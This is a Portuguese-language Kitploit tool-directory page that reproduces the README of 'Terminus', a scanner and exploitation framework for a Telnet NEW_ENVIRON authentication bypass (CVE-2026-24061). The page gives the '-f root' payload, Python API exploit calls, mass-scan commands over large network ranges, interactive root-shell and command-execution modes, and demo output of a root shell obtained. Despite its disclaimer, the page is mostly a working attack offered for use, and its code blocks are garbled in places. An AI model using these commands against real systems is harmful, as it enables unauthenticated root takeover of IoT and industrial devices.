Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Terrminus-CVE-2026-2406 — AsyncIO Scanner & Exploitation Framework para CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Recursos de descoberta de alta concorrência, fingerprinting passivo e escalonamento autorizado de shell root. | Kitploit
Ferramentas/GitHubGitHub/ridpath/terrminus-cve-2026-2406
Escalada de PrivilégiosReconhecimentoScanners de VulnerabilidadesSegurança IoTExploraçãoSegurança SCADA/ICSColeta de InformaçõesSegurança WebSegurança de Rede

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Testes de Penetração
Red Teaming
GitHubridpath/terrminus-cve-2026-2406

Terrminus-CVE-2026-2406

AsyncIO Scanner & Exploitation Framework para CVE-2026-24061 (Telnet NEW_ENVIRON Auth Bypass). Recursos de descoberta de alta concorrência, fingerprinting passivo e escalonamento autorizado de shell root.

Ver Repositório
2há 6 mesesAinda não revisado

Terminus - Scanner e Framework de Exploração CVE-2026-24061

Um motor de análise de segurança para a vulnerabilidade de bypass de autenticação e escalonamento de privilégios CVE-2026-24061 Telnet NEW_ENVIRON.

Terminus


Visão Geral

Terminus é uma ferramenta profissional de pesquisa em segurança projetada para testes de penetração autorizados e avaliação de vulnerabilidades do CVE-2026-24061. Esta vulnerabilidade crítica afeta implementações legadas de daemons Telnet, permitindo que atacantes remotos não autenticados contornem a autenticação e obtenham acesso de nível root.

O que é o CVE-2026-24061?

O CVE-2026-24061 é uma vulnerabilidade de Execução Remota de Código em serviços Telnet que suportam RFC 1572 (Opção de Ambiente Telnet). A vulnerabilidade explora a sanitização inadequada da variável de ambiente USER durante a subnegociação NEW_ENVIRON:

  • Autenticação normal: USER=john → solicita senha
  • Payload de exploit: USER=-f root → contorna a autenticação, concede shell root

Impacto:

  • Bypass completo de autenticação (nenhuma senha necessária)
  • Escalonamento imediato de privilégios para root
  • Comprometimento total do sistema

Serviços Afetados:

  • Telnet GNU Inetutils telnetd legado (especificamente versões até 2.7)
  • Firmware IoT com implementações Telnet vulneráveis
  • Sistemas de controle industrial com serviços Telnet desatualizados

Principais Recursos

Scanner de Vulnerabilidades em Massa

  • Varredura de Alta Concorrência: Varredura de 1.000+ alvos simultaneamente usando AsyncIO
  • Suporte a CIDR: Varredura de faixas de rede inteiras (192.168.0.0/24, 10.0.0.0/8)
  • Modos de Detecção Duplos:
    • Passivo (padrão): Detecção rápida, segura e baseada em assinaturas
    • Verificação Ativa (--verify): Prova de exploit, confirma acesso root uid=0
  • Análise de Banner: Identificação de tipos e versões de daemons por impressão digital
  • Pontuação de Risco: Avaliação de confiança em múltiplas camadas (CRÍTICO, ALTO, MÉDIO, BAIXO)

Motor de Protocolo Compatível com RFC

  • Classe TerminusNegotiator: API limpa para operações de protocolo Telnet
    • Terminus.handshake() - Handshake compatível com RFC 854
    • Terminus.exploit() - Entrega de payload CVE-2026-24061
  • Negociação Adequada de Opções: Evita detecção por IDS/IPS por meio de conformidade com o protocolo
  • Máquina de Estados: Tratamento robusto de sequências IAC (DO/DONT/WILL/WONT/SB/SE)

Exploração Controlada por Autorização

  • Shell Interativo: Shell completo pós-exploração com acesso root
  • Execução de Comandos: Executa comandos individuais e captura a saída
  • Coleta de Evidências: Reúne uid, variáveis de ambiente, informações do sistema
  • Mecanismos de Segurança:
    • Exige o flag explícito --exploit
    • Desabilitado no modo de varredura em lote
    • Registro de auditoria de todas as tentativas de exploração

Relatórios em Múltiplos Formatos

  • Terminal: Tabelas ricamente formatadas com níveis de risco codificados por cores
  • JSON: Integração com SIEM/SOAR
  • CSV: Rastreamento em planilhas
  • HTML: Relatórios detalhados com estatísticas
  • Markdown: Saída amigável para documentação

Arquitetura

Motor Principal: TerminusNegotiator

O coração do Terminus é a classe TerminusNegotiator, que fornece uma separação limpa entre o tratamento do protocolo e a lógica de exploração:```python from terminus import TerminusNegotiator

Initialize engine

negotiator = TerminusNegotiator()

Step 1: RFC 854 compliant handshake

await negotiator.handshake(target="192.168.1.100", port=23)

Step 2: Deliver CVE-2026-24061 payload

result = await negotiator.exploit(payload="-f root")

if result.success: print(f"Root shell acquired: {result.evidence['uid']}")

root@kitploit:~
### Abordagem de Engine vs. Script

**Scripts tradicionais** (ferramentas existentes):```
Target → Raw Socket → Payload → Blind Execution → Hope for Shell

Terminus engine:``` Target → Discovery → RFC Handshake → Passive Analysis → Risk Assessment ↓ [Optional] Verified Exploitation → Evidence Collection → Report

root@kitploit:~
---

## Instalação

### Requisitos
- **Python 3.10+**
- **Plataformas suportadas:**
  - Windows 10/11 (PowerShell)
  - Windows + WSL2 (Kali Linux, Parrot OS, Ubuntu)
  - Linux nativo (Kali, Parrot, Ubuntu, Debian)
  - macOS (com Python 3.10+)

### Início Rápido (Todas as Plataformas)

#### Windows (PowerShell)```powershell
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git

# Run setup script
.\setup_env.ps1

# Activate virtual environment
.venv\Scripts\Activate.ps1

# Verify installation
terminus --version

Linux / WSL2 / macOS (Bash)```bash

Clone repository

git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git cd Terminus-CVE-2025-2406

Run setup script

chmod +x setup_env.sh ./setup_env.sh

Activate virtual environment

source venv/bin/activate

Verify installation

terminus --version

root@kitploit:~
#### Instalação Manual (Todas as Plataformas)```bash
# Clone repository
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406.git
cd Terrminus-CVE-2026-2406

# Create virtual environment
python3 -m venv venv

# Activate (Linux/macOS/WSL)
source venv/bin/activate

# Activate (Windows PowerShell)
# venv\Scripts\Activate.ps1

# Install dependencies
pip install -e .

# Verify
terminus --version

Dependências (Multiplataforma)

  • telnetlib3 - Implementação do protocolo Telnet AsyncIO
  • rich - Interface de terminal e formatação (suporte a ANSI no Windows/Linux)
  • pydantic - Validação de dados e modelos
  • aiofiles - E/S de arquivos assíncrona
  • jinja2 - Modelagem de relatórios
  • pyyaml - Gerenciamento de configuração
  • pathlib - Manipulação de caminhos multiplataforma (integrado)

Nota: Todas as dependências são Python puro ou possuem wheels multiplataforma. Nenhuma compilação específica de plataforma é necessária.


Conclusão de Shell (Opcional)

Ative a conclusão por tabulação para entrada de comandos mais rápida:

Bash```bash

_TERMINUS_COMPLETE=bash_source terminus > ~/.terminus-complete.bash echo 'source ~/.terminus-complete.bash' >> ~/.bashrc source ~/.bashrc

root@kitploit:~
### Zsh```bash
_TERMINUS_COMPLETE=zsh_source terminus > ~/.terminus-complete.zsh
echo 'source ~/.terminus-complete.zsh' >> ~/.zshrc
source ~/.zshrc

Fish```bash

_TERMINUS_COMPLETE=fish_source terminus > ~/.config/fish/completions/terminus.fish

root@kitploit:~
### PowerShell```powershell
# Add to $PROFILE
_TERMINUS_COMPLETE=powershell_source terminus | Out-String | Invoke-Expression

Teste-o:```bash terminus # Shows: scan, exploit, version terminus scan - # Shows: -t, -f, -p, --verify, etc.

root@kitploit:~
---

## Utilização

### Modos de Digitalização

#### Digitalização de Alvo Único```bash
terminus scan -t 192.168.1.100

Varredura de Faixa CIDR```bash

terminus scan -t 192.168.1.0/24

root@kitploit:~
#### Digitalização em Lote Baseada em Arquivos```bash
# targets.txt contains one IP/CIDR per line
terminus scan -f targets.txt --threads 500

Varredura de Rede de Alta Concorrência```bash

terminus scan -t 10.0.0.0/8 --threads 1000 --rate-limit 200

root@kitploit:~
### Modos de Deteção

#### Deteção Passiva (Padrão - Seguro)```bash
terminus scan -t target.com --passive-only

Deteção Agressiva (Todas as Heurísticas)```bash

terminus scan -t target.com --aggressive

root@kitploit:~
#### Modo de Verificação Ativa (Prova de Exploração)```bash
terminus scan -t 192.168.1.100 --verify

Utilização

Demonstração ao Vivo

Verificar versão:```powershell PS C:\terminus> terminus --version Terminus v1.0.0 CVE-2026-24061 Telnet NEW_ENVIRON Scanner & Exploitation Framework Signatures database: C:\terminus\signatures.db

root@kitploit:~
**Digitalização passiva (padrão - avaliação de risco conservadora):**```powershell
PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Parsing 1 targets...
Found 1 valid targets

  Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 0 0:00:00

╭────── Scan Summary ──────╮
│ CVE: CVE-2026-24061      │
│ Total Targets: 1         │
│ Scanned: 1               │
│ Failed: 0                │
│ Timeouts: 0              │
│                          │
│ Vulnerability Breakdown: │
│   Critical: 0            │
│   High: 0                │
│   Medium: 0              │
│   Low: 1                 │
│   Info: 0                │
│                          │
│ Duration: 3.53s          │
│ Avg Scan Time: 3522.22ms │
│                          │
╰──────────────────────────╯

                                 Terminus - CVE-2026-24061 Scan Results
╭───────────────┬──────┬───────────┬──────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮
│ Target        │ Port │  Status   │ Risk │ Daemon  │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │
├───────────────┼──────┼───────────┼──────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤
│ 172.17.45.122 │ 2323 │ completed │ Low  │ unknown │ Unknown │     YES     │    -     │       3522.22 │
╰───────────────┴──────┴───────────┴──────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

No vulnerable targets found

Verificação ativa com --verify (prova de exploração):```powershell PS C:\terminus> python -m terminus scan -t 172.17.45.122 -p 2323 --verify

================================================================ TERMINUS CVE-2026-24061 Scanner & Exploitation Framework

Parsing 1 targets... Found 1 valid targets

Scanning 1 targets... ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% (1/1) Vulnerable: 1 0:00:00

╭────── Scan Summary ──────╮ │ CVE: CVE-2026-24061 │ │ Total Targets: 1 │ │ Scanned: 1 │ │ Failed: 0 │ │ Timeouts: 0 │ │ │ │ Vulnerability Breakdown: │ │ Critical: 1 │ │ High: 0 │ │ Medium: 0 │ │ Low: 0 │ │ Info: 0 │ │ │ │ Duration: 8.04s │ │ Avg Scan Time: 8029.55ms │ │ │ ╰──────────────────────────╯

root@kitploit:~
                               Terminus - CVE-2026-24061 Scan Results

╭───────────────┬──────┬───────────┬──────────┬─────────┬─────────┬─────────────┬──────────┬───────────────╮ │ Target │ Port │ Status │ Risk │ Daemon │ Version │ NEW_ENVIRON │ Verified │ Duration (ms) │ ├───────────────┼──────┼───────────┼──────────┼─────────┼─────────┼─────────────┼──────────┼───────────────┤ │ 172.17.45.122 │ 2323 │ completed │ Critical │ unknown │ Unknown │ YES │ ROOT │ 8029.55 │ ╰───────────────┴──────┴───────────┴──────────┴─────────┴─────────┴─────────────┴──────────┴───────────────╯

Found 1 vulnerable targets!

root@kitploit:~
**Exploração interativa:**```powershell
PS C:terminus> python -m terminus exploit -t 172.17.45.122 -p 2323 --yes

================================================================
                        TERMINUS
       CVE-2026-24061 Scanner & Exploitation Framework
================================================================

Attempting exploitation of 172.17.45.122:2323...
Payload: -f root

CVE-2026-24061 exploitation attempt initiated with payload: -f root
CVE-2026-24061 exploitation SUCCESSFUL - root access obtained

[*] CVE-2026-24061 Interactive Shell Started
[*] Type 'exit' or press Ctrl+C to quit

whoami
root
┌──[root@parrot]─[~]
└──╼ #

Observações principais:

  • Modo passivo: Detectou suporte a NEW_ENVIRON, mas relatou risco BAIXO (conservador)
  • Verificação ativa: Confirmou acesso root (uid=0), elevado para risco CRÍTICO com status de verificação "ROOT"
  • Exploração: Shell root imediato sem solicitação de senha

O que faz:

  • Realiza detecção passiva primeiro (banner + análise de protocolo)
  • Se houver suspeita de vulnerabilidade, tenta exploração real com payload -f root
  • Confirma acesso root verificando uid=0 na resposta
  • Eleva o risco para CRÍTICO quando o acesso root é confirmado
  • Exibe o status de verificação nos resultados da varredura

Casos de uso:

  • Validação de alta confiança para relatórios de conformidade
  • Demonstrações de prova de conceito
  • Confirmação de explorabilidade antes de reportar aos fornecedores
  • Operações de red team que exigem coleta de evidências

Exemplo de saída:``` Target Port Status Daemon Risk Verified 192.168.1.100 23 VULNERABLE inetutils-telnetd CRITICAL ROOT ACCESS 192.168.1.101 23 VULNERABLE netkit-telnetd HIGH Not tested 192.168.1.102 23 SAFE OpenBSD-telnetd LOW N/A

root@kitploit:~
**Verificação em lote:**```bash
terminus scan -f targets.txt --verify -o json -w verified_results.json

Nota: A verificação ativa explora vulnerabilidades. Use apenas com autorização adequada.

Formatos de Saída

Saída JSON```bash

terminus scan -t 192.168.1.0/24 -o json > results.json

root@kitploit:~
#### Relatório HTML```bash
terminus scan -f targets.txt -o html -w report.html

Exportação CSV```bash

terminus scan -t 10.0.0.0/24 -o csv > vulnerabilities.csv

root@kitploit:~
### Exploração (Somente Uso Autorizado)

#### Shell Interativo```bash
terminus exploit -t 192.168.1.100
# Requires confirmation prompt
# Grants root shell on vulnerable target

Execução de Comandos```bash

terminus exploit -t 192.168.1.100 -c "id"

Output: uid=0(root) gid=0(root) groups=0(root)

root@kitploit:~
#### Payload Personalizado```bash
terminus exploit -t 192.168.1.100 --payload "-f admin"

Comandos de Utilidade

Atualizar Assinaturas de Vulnerabilidades```bash

terminus update-signatures

root@kitploit:~
#### Verificar Resultados Anteriores```bash
terminus verify -f results.json

Mostrar Versão e Assinaturas```bash

terminus version

root@kitploit:~
---

## Configuração do Ambiente de Teste

### Para Red Team: Implantação Multiplataforma

**O Terminus foi projetado para implantação portátil** - copie o diretório para qualquer sistema Windows/Linux e execute sem instalação:```bash
# Copy terminus directory to target system
# No hardcoded paths - everything is relative

# Run directly (no installation needed)
cd terminus
python3 -m terminus scan -t 192.168.1.0/24

# All output stays in project directory:
# - Logs: ./logs/terminus.log
# - Reports: ./reports/
# - Config: ./config.yaml

Ambiente de Teste WSL2 (Windows)

Recomendado para estações de trabalho de Red Team no Windows - ambiente Linux isolado para implantar serviços de teste vulneráveis:

Instalar WSL2 com Kali ou Parrot```powershell

Windows PowerShell (Admin)

Install WSL2

wsl --install

Install Kali Linux

wsl --install -d kali-linux

OR Install Parrot OS (if available)

wsl --install -d ParrotOS

Verify

wsl -l -v

root@kitploit:~
#### Dentro do WSL2 (Kali/Parrot)```bash
# Update system
sudo apt update && sudo apt upgrade -y

# Install Terminus dependencies
sudo apt install python3 python3-pip python3-venv

# Install testing tools
sudo apt install netkit-telnetd telnetd wireshark tcpdump

# Clone and setup Terminus
git clone https://github.com/ridpath/Terrminus-CVE-2026-2406
cd Terminusb-CVE-2026-2406
./setup_env.sh
source venv/bin/activate

Implantar Serviço de Teste Vulnerável (Somente WSL2)

AVISO: Somente em ambientes de laboratório isolados. Nunca em sistemas de produção.```bash

Inside WSL2

Install vulnerable netkit-telnetd version

sudo apt install netkit-telnetd=0.17-*

Configure for NEW_ENVIRON support

Edit /etc/inetd.conf to enable telnet

Start service

sudo systemctl restart inetd

Test from Windows host

From PowerShell:

terminus scan -t $(wsl hostname -I)

root@kitploit:~
### Matriz de Testes Multiplataforma

Teste o Terminus em todas as plataformas utilizadas pela sua Red Team:

| Plataforma | Instalação | Varredura | Exploração |
|----------|-------------|----------|--------------|
| Windows 10/11 (PowerShell) | Sim | Sim | Sim |
| WSL2 - Kali Linux | Sim | Sim | Sim |
| WSL2 - Parrot OS | Sim | Sim | Sim |
| WSL2 - Ubuntu | Sim | Sim | Sim |
| Kali Linux nativo | Sim | Sim | Sim |
| Parrot OS nativo | Sim | Sim | Sim |
| macOS | Sim | Sim | Sim |

---

## Referência da API

### Integração com Python```python
import asyncio
from terminus import TerminusScanner, TerminusExploiter, TerminusNegotiator
from terminus.reporting.models import RiskScore

async def scan_network():
    # High-level scanner
    async with TerminusScanner() as scanner:
        async for result in scanner.scan_targets(["192.168.1.0/24"]):
            if result.risk_score == RiskScore.CRITICAL:
                print(f"CRITICAL: {result.target}")
                print(f"   Daemon: {result.daemon_type} {result.version}")
                print(f"   Confidence: {result.vulnerability_confidence:.2%}")

async def exploit_target():
    # Direct engine usage
    negotiator = TerminusNegotiator()
    
    # Handshake
    success = await negotiator.handshake(target="192.168.1.100", port=23)
    if not success:
        print("Handshake failed")
        return
    
    # Exploit
    result = await negotiator.exploit(payload="-f root")
    if result.success:
        print(f"Root access obtained")
        print(f"Evidence: {result.evidence}")

# Run
asyncio.run(scan_network())

Segurança e Ética

Aviso Legal

Esta ferramenta destina-se APENAS a:

  • Testes de penetração autorizados
  • Pesquisa de segurança em ambientes controlados
  • Competições CTF e laboratórios educacionais
  • Avaliações de segurança defensiva com permissão por escrito

O uso não autorizado é ILEGAL e antiético.

Mecanismos de Segurança

  1. Autorização Necessária: A exploração exige a flag explícita --exploit
  2. Solicitações de Confirmação: Confirmação interativa antes da exploração
  3. Registro de Auditoria: Todas as tentativas de exploração são registradas com carimbos de data/hora
  4. Aplicação de Alvo Único: Exploração desativada no modo de varredura em lote
  5. Limitação de Taxa: Previne DoS acidental durante a varredura

Divulgação Responsável

Se você descobrir sistemas vulneráveis usando o Terminus:

  1. NÃO explore sistemas sem autorização por escrito
  2. Relate as descobertas aos proprietários dos sistemas por meio de divulgação responsável
  3. Documente as descobertas usando os recursos de relatório do Terminus
  4. Siga as diretrizes de divulgação coordenada de vulnerabilidades

Referências

Informações do CVE

  • ID do CVE: CVE-2026-24061
  • Gravidade: CRÍTICA (CVSS 9.8)
  • Vetor: Rede, Não Autenticado, Baixa Complexidade

Pesquisa e Implementação

  • Pesquisa Primária: SafeBreach-Labs CVE-2026-24061
  • Exploit de Referência: telnet_rce.py
  • Scanner em Lote: TryA9ain CVE-2026-24061

Padrões de Protocolo

  • RFC 854: Especificação do Protocolo Telnet
  • RFC 1572: Opção de Ambiente Telnet

Testes e Validação

Cobertura de Testes

  • Mais de 90% de cobertura de código com pytest
  • Testes unitários para todos os módulos principais
  • Testes de integração com servidor Telnet simulado
  • Benchmarks de desempenho (1.000 alvos em menos de 60 segundos)

Checklist de Testes Manuais

  • Escanear serviço vulnerável (verificar detecção)
  • Escanear serviço corrigido (verificar ausência de falso positivo)
  • Testar bypass de autenticação (sem prompt de senha)
  • Verificar escalonamento de privilégios (uid=0)
  • Monitorar alertas de IDS (verificar furtividade)
  • Teste de desempenho (1.000+ alvos)

Configuração

config.yaml (Multiplataforma)

Todos os caminhos são relativos à raiz do projeto - funciona em Windows, Linux e WSL sem modificação:```yaml

config.yaml - Cross-platform configuration

All paths relative to project directory

scanner: default_port: 23 connect_timeout: 3.0 handshake_timeout: 5.0 max_concurrent: 1000 rate_limit: 100 # connections/second

detection: passive_only: true # Safe mode by default banner_timeout: 2.0 heuristic_checks: true

Signature database (relative path)

signatures_db: "./signatures.db"

exploit: require_authorization: true default_payload: "-f root" evidence_collection: true interactive_shell: true

reporting: default_format: "terminal" include_safe_targets: false verbosity: "normal"

Output directory (relative path - works on Windows/Linux)

output_dir: "./reports"

logging: level: "INFO"

Log file (relative path - automatic directory creation)

file: "./logs/terminus.log" format: "json" console_enabled: true


Acknowledgments

  • SafeBreach Labs: Original CVE-2026-24061 research and exploit implementation
  • TryA9ain: Batch scanning approach inspiration
  • RFC Authors: Telnet protocol specifications

Baixar ferramenta